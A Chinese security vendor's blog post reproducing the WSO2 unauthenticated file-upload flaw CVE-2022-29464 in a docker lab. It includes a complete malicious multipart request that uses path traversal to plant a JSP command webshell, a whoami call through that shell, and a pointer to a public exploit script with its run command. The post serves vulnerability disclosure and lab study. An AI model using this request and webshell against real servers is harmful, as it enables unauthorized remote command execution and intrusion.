CVE-2022-29464 WSO2文件上传漏洞复现





首页 产品与服务 解决方案 客户案例 技术支持 合作发展 关于美创 用户退出 合作商登录 用户登录 申请试用

行业解决方案政府解决方案金融解决方案医疗解决方案教育解决方案能源解决方案物流交通解决方案

售后服务文档中心年度培训

渠道政策申请成为合作伙伴渠道专区

公司动态行业资讯安全研究

热门阅读

2025中国互联网产业年会丨《中国互联网产业绿色算力发展倡议》正式发布

2025-02-07

美创用户专访 | 精细化管理：医疗行业数据分类分级的策略与实践

2025-01-10

容灾演练双月报｜美创助力某特大型通信基础设施央企顺利完成多个核心系统异地容灾演练

2025-01-10

国家级｜美创、徐医附院共建项目入选工信部《2024年网络安全技术应用典型案例拟支持项目名单》

2024-12-20

全球数据跨境流动合作倡议

2024-11-22

每周安全速递³⁴⁴ | 维多利亚的秘密因网络安全事件推迟2025年一季度财报发布

2025-06-06

每周安全速递³⁴³ | Everest勒索软件泄露可口可乐员工数据

2025-05-30

每周安全速递³⁴² | 勒索组织El Dorado攻击中东薪资服务商BSH间接导致博通员工敏感数据泄露

2025-05-23

每周安全速递³⁴¹ | 摩尔多瓦执法机关逮捕涉嫌DoppelPaymer勒索软件攻击的嫌疑人

2025-05-16

每周安全速递³⁴⁰ | 黑客利用配置不当的K8s集群部署挖矿软件

2025-04-30

CVE-2022-29464 WSO2文件上传漏洞复现

发布时间：2023-01-20 阅读次数： 506 次

漏洞简介

CVE-2022-29464 WSO2文件上传漏洞是Orange Tsai发现的WSO2上的严重漏洞。该漏洞允许攻击者未授权上传jsp webshell从而在WSO2服务器上执行任意命令。

漏洞影响版本

WSO2 API Manager 2.2.0—4.0.0
WSO2 Identity Server 5.2.0—5.11.0
WSO2 身份服务器5.4.0、5.4.1、5.5.0 和 5.6.0
WSO2 Enterprise Integrator 6.2.0—6.6.0
WSO2 身份服务器密钥管理器 5.3.0—5.10.0

漏洞环境搭建

可从vulfocus中拉取docker漏洞镜像，如图所示，执行命令

docker pull vulfocus/wso2-cve_2022_29464

拉取漏洞镜像

漏洞镜像拉取完成后，如图所示，执行命令

docker run -d -it -p 8280:8280 -p 8243:8243 -p 9443:9443 --name cve_2022_29464 vulfocus/wso2-cve_2022_29464

运行漏洞docker环境

漏洞环境启动完成后，访问

https://ip:9443

出现以下页面代表漏洞环境搭建成功

漏洞复现

如图所示，构造如下数据包即可未授权在目标服务器上写入cmd webshell

POST /fileupload/toolsAny HTTP/1.1Host: 192.168.159.130:9443User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeContent-Type: multipart/form-data; boundary=4af6f362a86baadf5ec3177278d4911Cookie: session=0cb2ce62-1f82-4c51-8735-229398731d4f.XC9bRwlYo7x31-PjcBFWrJnuG_w; JSESSIONID=C7832D63E80798858C15459A4267966EUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: cross-siteContent-Length: 805
--4af6f362a86baadf5ec3177278d4911Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/cmd.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/cmd.jsp"
<%@ page import="java.io.*" %>    <%    String cmd = request.getParameter("cmd");    String output = "";    if(cmd != null) {        String s = null;        try {            Process p = Runtime.getRuntime().ｅｘｅｃ(cmd,null,null);            BufferedReader sI = new BufferedReader(newInputStreamReader(p.getInputStream()));            while((s = sI.readLine()) != null) { output += s+"</br>"; }        }  catch(IOException e) {   e.printStackTrace();   }    }%>        <pre><%=output %></pre>--4af6f362a86baadf5ec3177278d4911--

访问

https://192.168.159.130:9443/authenticationendpoint/cmd.jsp?cmd=whoami

构造参数cmd和参数值whoami，即可获得WSO2服务器whoami命令执行结果

也可通过漏洞EXP

https://github.com/hakivvi/CVE-2022-29464

利用漏洞

如图所示，将EXP下载后，执行

python exploit.py https://ip:9443/ shell.jsp

即可上传jsp cmdshell至WSO2服务器

访问

https://ip:9443//authenticationendpoint/shell.jsp

即可通过jsp cmdshell执行任意命令

漏洞修复

将存在漏洞的WSO2应用版本升级至安全版本。

上一条：每周安全速递²⁴⁴|挪威船级社遭受勒索软件攻击导致全球1000艘船受影响
下一条：美创科技发布《2022勒索病毒威胁年度报告》

免费试用

服务热线

马上咨询

400-811-3777

回到顶部



热门推荐

政府解决方案

金融解决方案

医疗解决方案

教育解决方案

能源解决方案

物流交通解决方案

热门资讯

热门资讯

热门资讯

热门资讯





热门推荐

政府解决方案

金融解决方案

医疗解决方案

教育解决方案

能源解决方案

物流交通解决方案

热门资讯

热门资讯

热门资讯

热门资讯

 



